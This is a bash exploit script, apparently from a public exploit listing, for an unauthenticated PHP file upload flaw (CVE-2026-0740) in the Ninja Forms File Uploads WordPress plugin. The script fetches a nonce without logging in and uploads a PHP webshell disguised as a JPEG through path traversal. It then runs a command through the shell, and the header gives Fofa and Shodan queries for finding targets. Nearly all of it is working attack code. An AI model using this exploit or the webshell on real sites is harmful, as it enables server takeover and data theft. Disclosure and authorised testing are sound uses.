# Exploit Title: Ninja Forms Uploads - Unauthenticated PHP File Upload
# Date: 2026-04-09
# Exploit Author: Sélim Lanouar (@whattheslime)
# Vendor Homepage: https://ninjaforms.com/
# Software Link: https://ninjaforms.com/extensions/file-uploads/
# Version: 3.3.24
# Tested on: WordPress (6.9.3) on Apache and Nginx servers
# CVE: CVE-2026-0740
# Fofa Query: body="nfpluginsettings.js?ver="
# Shodan Query: http.html:"nfpluginsettings.js?ver="
# =============================================================================
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <target_url>"
exit 1
fi
target=$1
field_id=$(head /dev/urandom | tr -dc '1-9' | head -c 16 ; echo)
file_name=webshell.php
echo "[-] Writing webshell in /tmp/$file_name..."
echo '<?php system($_GET["cmd"]); ?>' > /tmp/$file_name
echo "[-] Fetching nonce for random field_id $field_id..."
nonce=$(curl -s -X POST "$target/wp-admin/admin-ajax.php" \
-d "action=nf_fu_get_new_nonce&field_id=$field_id" | jq -r '.data.nonce')
echo "[+] Got nf_fu_upload nonce: $nonce"
echo "[-] Uploading webshell..."
response=$(curl -ks -X POST "$target/wp-admin/admin-ajax.php" \
-F "action=nf_fu_upload" \
-F "nonce=$nonce" \
-F "form_id=$field_id" \
-F "field_id=$field_id" \
-F "image_jpg=../../../$file_name" \
-F "files-$field_id=@/tmp/$file_name;filename=image.jpg;type=image/jpeg")
echo "[+] Upload response: $response"
command="curl -ks '$target/wp-content/$file_name?cmd=id'"
echo "[-] Executing the 'id' command via the uploaded webshell: $command"
result=$(eval $command)
echo "[+] Command output: $result"
